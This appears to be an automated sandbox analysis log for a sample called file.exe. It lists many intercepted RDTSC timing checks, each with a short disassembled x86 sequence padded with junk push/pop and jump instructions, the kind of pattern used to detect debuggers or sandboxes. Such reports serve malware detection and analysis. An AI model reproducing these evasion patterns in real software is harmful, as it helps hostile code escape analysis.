Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E56A0 second address: 5E56E3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB4390A66C5h 0x0000000f jmp 00007FB4390A66C9h 0x00000014 pushad 0x00000015 jp 00007FB4390A66B6h 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5BCC second address: 5E5BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C61F2Ch 0x00000009 jmp 00007FB438C61F2Ah 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FB438C61F2Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5BF8 second address: 5E5C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB4390A66B6h 0x0000000a jng 00007FB4390A66B6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5C09 second address: 5E5C0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5C0E second address: 5E5C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5C14 second address: 5E5C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5C21 second address: 5E5C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB4390A66B6h 0x0000000a jmp 00007FB4390A66BBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9482 second address: 5E9493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C61F2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9493 second address: 5E9499 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9499 second address: 5E94A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FB438C61F26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC2CA second address: 5EC2D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC2D0 second address: 5EC2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB438C61F2Ah 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55D5D4 second address: 55D5F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jc 00007FB4390A66B6h 0x0000000f jmp 00007FB4390A66BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EBC20 second address: 5EBC28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EBC28 second address: 5EBC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EE234 second address: 5EE23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6445 second address: 5F6452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007FB4390A66BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F4E96 second address: 5F4E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F4FE6 second address: 5F4FF8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jl 00007FB4390A66B6h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5431 second address: 5F5446 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB438C61F2Ch 0x00000008 jl 00007FB438C61F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5446 second address: 5F544C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F544C second address: 5F5450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A46CC second address: 5A46D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A46D0 second address: 5A46D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5602 second address: 5F561A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F561A second address: 5F561E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F561E second address: 5F5622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6111 second address: 5F611E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F611E second address: 5F6122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6122 second address: 5F612D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F612D second address: 5F6133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6133 second address: 5F613A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F613A second address: 5F615B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB4390A66CCh 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8B02 second address: 5F8B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8DDD second address: 5F8E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB4390A66B6h 0x0000000a jno 00007FB4390A66B6h 0x00000010 jmp 00007FB4390A66C9h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jmp 00007FB4390A66C4h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FD226 second address: 5FD23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C61F30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FCC54 second address: 5FCC69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FB4390A66BEh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FCC69 second address: 5FCC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnc 00007FB438C61F2Ah 0x0000000b pushad 0x0000000c jne 00007FB438C61F26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 604A4B second address: 604A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB4390A66B6h 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 604A58 second address: 604A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB438C61F26h 0x0000000a pop eax 0x0000000b jmp 00007FB438C61F33h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 604D34 second address: 604D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 604D38 second address: 604D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 604D44 second address: 604D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 608EFD second address: 608F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FB438C61F2Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 608F17 second address: 608F23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 608F23 second address: 608F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C61F33h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6096FB second address: 609708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FB4390A66C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60982C second address: 60986A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB438C61F32h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FB438C61F2Eh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FB438C61F33h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60E45B second address: 60E461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60E461 second address: 60E467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60E467 second address: 60E482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB4390A66BEh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60E482 second address: 60E488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60E488 second address: 60E48C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B89 second address: 616B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B8F second address: 616B95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B95 second address: 616BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FB438C61F26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616BA5 second address: 616BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 614CFB second address: 614CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615132 second address: 615138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615138 second address: 61513E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61513E second address: 615144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615280 second address: 615284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615400 second address: 615443 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB4390A66BEh 0x00000008 jmp 00007FB4390A66BDh 0x0000000d pop edx 0x0000000e jns 00007FB4390A66C3h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FB4390A66BCh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61582D second address: 61583C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FB438C61F26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61583C second address: 615842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615842 second address: 61585F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C61F30h 0x00000009 popad 0x0000000a jng 00007FB438C61F2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61585F second address: 615895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007FB4390A66C1h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB4390A66C6h 0x00000013 popad 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615895 second address: 61589B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615B36 second address: 615B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB4390A66B6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007FB4390A66B6h 0x00000014 jmp 00007FB4390A66C1h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615B5C second address: 615B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615B62 second address: 615B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615B68 second address: 615B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615B6C second address: 615B97 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB4390A66C7h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615B97 second address: 615BA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007FB438C61F26h 0x00000009 pop esi 0x0000000a push edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B77F second address: 61B78B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB4390A66B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B78B second address: 61B7C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F36h 0x00000007 jmp 00007FB438C61F2Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB438C61F34h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B7C5 second address: 61B7C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621A27 second address: 621A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621A2B second address: 621A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621A31 second address: 621A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621A3A second address: 621A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621A44 second address: 621A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B190 second address: 62B195 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62B195 second address: 62B1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB438C61F26h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB438C61F30h 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62AD9E second address: 62ADA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62D3E6 second address: 62D3FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F30h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62D3FA second address: 62D405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63C42B second address: 63C43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C61F2Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64BBA2 second address: 64BBD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C2h 0x00000007 jnc 00007FB4390A66B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB4390A66C1h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64BBD6 second address: 64BBDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64BFDE second address: 64BFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64BFE2 second address: 64BFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB438C61F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FB438C61F2Ch 0x00000012 jne 00007FB438C61F26h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C252 second address: 64C257 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C257 second address: 64C285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jns 00007FB438C61F2Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB438C61F38h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C401 second address: 64C448 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FB4390A66C4h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007FB4390A66C3h 0x00000011 jmp 00007FB4390A66C7h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C5DB second address: 64C5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 jne 00007FB438C61F26h 0x0000000d jmp 00007FB438C61F32h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D029 second address: 64D02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D02D second address: 64D031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D031 second address: 64D03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
